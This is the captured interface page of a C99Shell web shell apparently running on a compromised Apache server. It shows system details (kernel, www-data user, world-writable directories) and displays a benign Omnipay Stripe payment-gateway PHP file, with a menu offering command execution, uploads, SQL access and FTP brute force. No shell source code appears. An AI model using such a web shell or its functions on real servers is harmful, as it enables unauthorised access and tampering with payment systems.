!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/dokan/script/vendor/omnipay/stripe/src/   drwxrwxrwx
Free 13.18 GB of 57.97 GB (22.74%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     PaymentIntentsGateway.php (4.82 KB)      -rwxrwxrwx
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * Stripe Payment Intents Gateway.
 */
namespace Omnipay\Stripe;

use 
Omnipay\Stripe\Message\PaymentIntents\Response;

/**
 * Stripe Payment Intents Gateway.
 *
 * @see \Omnipay\Stripe\AbstractGateway
 * @see \Omnipay\Stripe\Message\AbstractRequest
 *
 * @link https://stripe.com/docs/api
 *
 */
class PaymentIntentsGateway extends AbstractGateway
{
    
/**
     * @inheritdoc
     */
    
public function getName()
    {
        return 
'Stripe Payment Intents';
    }

    
/**
     * @inheritdoc
     *
     * @return \Omnipay\Stripe\Message\PaymentIntents\AuthorizeRequest
     */
    
public function authorize(array $parameters = array())
    {
        return 
$this->createRequest('\Omnipay\Stripe\Message\PaymentIntents\AuthorizeRequest'$parameters);
    }

    
/**
     * @inheritdoc
     *
     * In reality, we're confirming the payment intent.
     * This method exists as an alias to in line with how Omnipay interfaces define things.
     *
     * @return \Omnipay\Stripe\Message\PaymentIntents\ConfirmPaymentIntentRequest
     */
    
public function completeAuthorize(array $options = [])
    {
        return 
$this->confirm($options);
    }

    
/**
     * @inheritdoc
     *
     * @return \Omnipay\Stripe\Message\PaymentIntents\CaptureRequest
     */
    
public function capture(array $parameters = array())
    {
        return 
$this->createRequest('\Omnipay\Stripe\Message\PaymentIntents\CaptureRequest'$parameters);
    }

    
/**
     * Confirm a Payment Intent. Use this to confirm a payment intent created by a Purchase or Authorize request.
     *
     * @param array $parameters
     * @return \Omnipay\Stripe\Message\PaymentIntents\ConfirmPaymentIntentRequest
     */
    
public function confirm(array $parameters = array())
    {
        return 
$this->createRequest('\Omnipay\Stripe\Message\PaymentIntents\ConfirmPaymentIntentRequest'$parameters);
    }

    
/**
     * Cancel a Payment Intent.
     *
     * @param array $parameters
     * @return \Omnipay\Stripe\Message\PaymentIntents\CancelPaymentIntentRequest
     */
    
public function cancel(array $parameters = array())
    {
        return 
$this->createRequest('\Omnipay\Stripe\Message\PaymentIntents\CancelPaymentIntentRequest'$parameters);
    }

    
/**
     * @inheritdoc
     *
     * @return \Omnipay\Stripe\Message\PaymentIntents\PurchaseRequest
     */
    
public function purchase(array $parameters = array())
    {
        return 
$this->createRequest('\Omnipay\Stripe\Message\PaymentIntents\PurchaseRequest'$parameters);
    }

    
/**
     * @inheritdoc
     *
     * In reality, we're confirming the payment intent.
     * This method exists as an alias to in line with how Omnipay interfaces define things.
     *
     * @return \Omnipay\Stripe\Message\PaymentIntents\ConfirmPaymentIntentRequest
     */
    
public function completePurchase(array $options = [])
    {
        return 
$this->confirm($options);
    }

    
/**
     * Fetch a payment intent. Use this to check the status of it.
     *
     * @return \Omnipay\Stripe\Message\PaymentIntents\FetchPaymentIntentRequest
     */
    
public function fetchPaymentIntent(array $parameters = array())
    {
        return 
$this->createRequest('\Omnipay\Stripe\Message\PaymentIntents\FetchPaymentIntentRequest'$parameters);
    }

    
//
    // Cards
    // @link https://stripe.com/docs/api/payment_methods
    //

    /**
     * @return \Omnipay\Stripe\Message\PaymentIntents\FetchPaymentMethodRequest
     */
    
public function fetchCard(array $parameters = array())
    {
        return 
$this->createRequest('\Omnipay\Stripe\Message\PaymentIntents\FetchPaymentMethodRequest'$parameters);
    }

    
/**
     * @inheritdoc
     *
     * @return \Omnipay\Stripe\Message\PaymentIntents\CreatePaymentMethodRequest
     */
    
public function createCard(array $parameters = array())
    {
        return 
$this->createRequest('\Omnipay\Stripe\Message\PaymentIntents\CreatePaymentMethodRequest'$parameters);
    }

    
/**
     * @inheritdoc
     *
     * @return \Omnipay\Stripe\Message\PaymentIntents\CreatePaymentMethodRequest
     */
    
public function attachCard(array $parameters = array())
    {
        return 
$this->createRequest('\Omnipay\Stripe\Message\PaymentIntents\AttachPaymentMethodRequest'$parameters);
    }

    
/**
     * @inheritdoc
     *
     * @return \Omnipay\Stripe\Message\PaymentIntents\UpdatePaymentMethodRequest
     */
    
public function updateCard(array $parameters = array())
    {
        return 
$this->createRequest('\Omnipay\Stripe\Message\PaymentIntents\UpdatePaymentMethodRequest'$parameters);
    }

    
/**
     * @inheritdoc
     *
     * @return \Omnipay\Stripe\Message\PaymentIntents\DetachPaymentMethodRequest
     */
    
public function deleteCard(array $parameters = array())
    {
        return 
$this->createRequest('\Omnipay\Stripe\Message\PaymentIntents\DetachPaymentMethodRequest'$parameters);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0101 ]--